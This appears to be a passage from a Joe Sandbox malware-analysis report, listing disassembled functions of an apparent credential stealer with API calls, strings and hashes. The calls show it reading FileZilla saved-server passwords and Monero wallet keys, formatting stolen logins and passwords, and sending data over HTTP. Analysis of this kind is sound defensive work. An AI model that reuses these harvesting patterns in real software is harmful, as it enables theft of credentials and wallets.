                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00C10250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00C20DBA,00C20DB7,00C20DB6,00C20DB3), ref: 00C10362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C10369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C10385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C103CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C103DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00C10419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C10463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C1051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C1054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C10562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00C10571
                  • lstrcat.KERNEL32(?,url: ), ref: 00C10580
                  • lstrcat.KERNEL32(?,00000000), ref: 00C10593
                  • lstrcat.KERNEL32(?,00C21678), ref: 00C105A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00C105B5
                  • lstrcat.KERNEL32(?,00C2167C), ref: 00C105C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00C105D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00C105E6
                  • lstrcat.KERNEL32(?,00C21688), ref: 00C105F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00C10604
                  • lstrcat.KERNEL32(?,00000000), ref: 00C10617
                  • lstrcat.KERNEL32(?,00C21698), ref: 00C10626
                  • lstrcat.KERNEL32(?,00C2169C), ref: 00C10635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C1068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 9265794533206efb50e65c9be5619be9d5affe6989653f455ee5995ab6565a9d
                  • Instruction ID: 2d534f75e17f27ba0bc90cc1cc2de92065c7c6dcea757e33ad68546a27f059ef
                  • Opcode Fuzzy Hash: 9265794533206efb50e65c9be5619be9d5affe6989653f455ee5995ab6565a9d
                  • Instruction Fuzzy Hash: 44D152759412089FDB04EBF0DD8AEEE7338EF19310F544429F502B6191DF74AA8AEB61
                  Function 00C05960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C059F8
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C05A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C05B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0179EDE8,00000000,?,0179A970,00000000,?,00C21A1C), ref: 00C05E71
                  • lstrlen.KERNEL32(00000000), ref: 00C05E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C05E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C05E9A
                  • lstrlen.KERNEL32(00000000), ref: 00C05EAF
                  • lstrlen.KERNEL32(00000000), ref: 00C05ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C05EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00C05F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C05F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C05F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00C05FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00C05FBD
                  • HttpOpenRequestA.WININET(00000000,0179ED38,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C05BF8
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00C05FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: f8894f9d185c852d0f5f6cb754ccdd07731ead5808328881d74c4f9fac202aa0
                  • Instruction ID: c02c18231c05cd3d57ff1dd74964abc9502b98e7d92abfc65b6bcd4d6eefa2fc
                  • Opcode Fuzzy Hash: f8894f9d185c852d0f5f6cb754ccdd07731ead5808328881d74c4f9fac202aa0
                  • Instruction Fuzzy Hash: 8E121A71821128ABDB15EBA0DC95FEEB378BF15710F5041A9F10672091EF706B8AEF61
                  Function 00C0CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C0D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C0D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D208
                  • lstrcat.KERNEL32(?,00C21478), ref: 00C0D217
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D22A
                  • lstrcat.KERNEL32(?,00C2147C), ref: 00C0D239
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D24C
                  • lstrcat.KERNEL32(?,00C21480), ref: 00C0D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D26E
                  • lstrcat.KERNEL32(?,00C21484), ref: 00C0D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D290
                  • lstrcat.KERNEL32(?,00C21488), ref: 00C0D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D2B2
                  • lstrcat.KERNEL32(?,00C2148C), ref: 00C0D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D2D4
                  • lstrcat.KERNEL32(?,00C21490), ref: 00C0D2E3
                    • Part of subcall function 00C1A820: lstrlen.KERNEL32(00C04F05,?,?,00C04F05,00C20DDE), ref: 00C1A82B
                    • Part of subcall function 00C1A820: lstrcpy.KERNEL32(00C20DDE,00000000), ref: 00C1A885
                  • lstrlen.KERNEL32(?), ref: 00C0D32A
                  • lstrlen.KERNEL32(?), ref: 00C0D339
                    • Part of subcall function 00C1AA70: StrCmpCA.SHLWAPI(01799380,00C0A7A7,?,00C0A7A7,01799380), ref: 00C1AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 5e84752cd136915a02756344e4ca55613a321cfa99dcc0f1464b7e0aede4515c
                  • Instruction ID: 3e50e49ca44d8c867e368ef3b44eb424f03207957c494b13e8fedea018aca278
                  • Opcode Fuzzy Hash: 5e84752cd136915a02756344e4ca55613a321cfa99dcc0f1464b7e0aede4515c
                  • Instruction Fuzzy Hash: 26E16E75851108AFDB04FBA1DD96EEE7378BF16310F144068F507B60D1DE34AA4AEBA2
                  Function 00C04880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C04915
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C0493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C04ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C20DDB,00000000,?,?,00000000,?,",00000000,?,0179EDC8), ref: 00C04DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C04E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C04E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C04E49
                  • InternetCloseHandle.WININET(00000000), ref: 00C04EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00C04EC5
                  • HttpOpenRequestA.WININET(00000000,0179ED38,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C04B15
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00C04ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: eef49a77e1aaa67de200dc7c2f21af798d87f4e2443aae9685982fb0ab5ff329
                  • Instruction ID: 9f82472990702dafbcfdb5333ff479dceaf84590746998735342020b9fc85ba6
                  • Opcode Fuzzy Hash: eef49a77e1aaa67de200dc7c2f21af798d87f4e2443aae9685982fb0ab5ff329
                  • Instruction Fuzzy Hash: A712FF71911218AADB15EB90DD92FEEB378BF16310F5041A9B106720D1DF706F8AEF62
                  Function 00C0C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0179E308,00000000,?,00C2144C,00000000,?,?), ref: 00C0CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C0CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00C0CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C0CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C0CAD9
                  • StrStrA.SHLWAPI(?,0179E4A0,00C20B52), ref: 00C0CAF7
                  • StrStrA.SHLWAPI(00000000,0179E4B8), ref: 00C0CB1E
                  • StrStrA.SHLWAPI(?,0179DCA0,00000000,?,00C21458,00000000,?,00000000,00000000,?,01799530,00000000,?,00C21454,00000000,?), ref: 00C0CCA2
                  • StrStrA.SHLWAPI(00000000,0179DA00), ref: 00C0CCB9
                    • Part of subcall function 00C0C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C0C871
                    • Part of subcall function 00C0C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C0C87C
                  • StrStrA.SHLWAPI(?,0179DA00,00000000,?,00C2145C,00000000,?,00000000,01799540), ref: 00C0CD5A
                  • StrStrA.SHLWAPI(00000000,01799210), ref: 00C0CD71
                    • Part of subcall function 00C0C820: lstrcat.KERNEL32(?,00C20B46), ref: 00C0C943
                    • Part of subcall function 00C0C820: lstrcat.KERNEL32(?,00C20B47), ref: 00C0C957
                    • Part of subcall function 00C0C820: lstrcat.KERNEL32(?,00C20B4E), ref: 00C0C978
                  • lstrlen.KERNEL32(00000000), ref: 00C0CE44
                  • CloseHandle.KERNEL32(00000000), ref: 00C0CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 10d12a1afb59e468bcfe0b9f75a00251b3182c464057989e491d6c6b9582688d
                  • Instruction ID: 9f127669d3e68cbe84ac57221c15271ad5bfd7c0597f053b88bb98e3be12f696
                  • Opcode Fuzzy Hash: 10d12a1afb59e468bcfe0b9f75a00251b3182c464057989e491d6c6b9582688d
                  • Instruction Fuzzy Hash: 24E11A71911108AFDB14EBA0DD96FEEB778AF15310F044169F106B7191EF306A8BEB62
                  Function 00C18320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0179B648,00000000,00020019,00000000,00C205B6), ref: 00C183A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C18426
                  • wsprintfA.USER32 ref: 00C18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C18499
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
